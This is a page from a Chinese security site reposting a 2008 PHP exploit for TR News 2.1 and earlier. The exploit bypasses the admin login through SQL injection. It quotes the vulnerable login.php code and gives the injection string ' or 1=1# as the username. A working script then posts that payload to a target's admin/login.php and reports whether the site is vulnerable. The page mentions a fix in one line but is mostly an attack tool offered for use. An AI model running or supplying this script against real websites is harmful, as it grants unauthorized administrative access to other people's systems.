首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 TR News <= 2.1 (login.php) Remote Login Bypass Exploit 来源：StAkeR[at]hotmail[dot]it 作者：StAkeR 发布时间：2008-11-05   <?php error_reporting(0); /*    ------------------------------------------------------    TR News <= 2.1 (login.php) Remote Login ByPass Exploit    ------------------------------------------------------    By StAkeR[at]hotmail[dot]it    http://www.easy-script.com/scripts-dl/trscript-21.zip    File admin/login.php       1. <?    2. if(isset($_POST['login_ad']) && ($_POST['password']))    3.   {    4. include("../include/connexion.php");    5. $login=$_POST["login_ad"];    6. $pass=md5($_POST["password"]);    7. $sql="SELECT * FROM tr_user_news WHERE pseudo='$login' AND pass='$pass';";    8. $p = mysql_query($sql);    9. $row = mysql_fetch_assoc($p);   10. $admin = $row['admin'];   11. if($admin != 1)     $login = $_POST"login_ad"]; isn't escaped,so you can insert SQL code...   how to fix? sanize $login with mysql_real_escape_string or htmlentities       NOTE:     if the website is vulnerable,you must go to admin/login.php     Username: ' or 1=1#   Password: no-deface   */ if(preg_match('/http://(.+?)/i',$argv[1]) or empty($argv[1])) athos(); $host = explode('/',$argv[1]); $auth = "login_ad=%27+or+1%3D1%23&password=athos"; $data = "POST /$host[1]/admin/login.php HTTP/1.1\r\n".         "Host: $host[0]\r\n".         "Content-Type: application/x-www-form-urlencoded\r\n".         "Content-Length: ".strlen($auth)."\r\n\r\n".         "$auth\r\n\r\n";     if(!$socket = fsockopen($host[0],80)) die("fsockopen() error!\n");  if(!fputs($socket,$data)) die("fputs() error!\n"); while(!feof($socket)) {   $content .= fgets($socket); } fclose($socket); if(preg_match("/location: main\.php\?mode=main/i",$content)) {   exploiting();   echo "\n[+] Exploit Successfully!\n[+] Site Vulnerable\n";   exit; } else {   exploiting();   echo "\n[+] Exploit Failed!\n[+] Site Not Vulnerable!\n";   exit; }   function athos() {   global $argv;     echo "[+] TR News <= 2.1 (login.php) Remote Login ByPass Exploit\n";   echo "[+] Usage: php $argv[0] [host/path]\r\n";   exit; }   function exploiting() {   echo "[+] Exploiting";   for($i=0;$i<=3;$i++)   {     echo ".";     sleep(1);   } }    [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Simple Machines Forum (SMF) 1. ·deV!Lz Clanportal [DZCP] <= 1 ·Chipmunk CMS (reguser.php) Add ·PHPX 3.5.16 (news_id) Remote S ·Adobe Reader util.printf() Jav ·Simple Machines Forum <= 1.1.6 ·e-Vision CMS <= 2.0.2 Multiple ·VLC Media Player < 0.9.6 .RT S ·deV!Lz Clanportal [DZCP] <= 1 ·GE Proficy Real Time Informati ·Chipmunk CMS (reguser.php) Add ·MemHT Portal <= 4.0 Remote Cod   推荐广告

CopyRight © 2002-2025 VFocuS.Net All Rights Reserved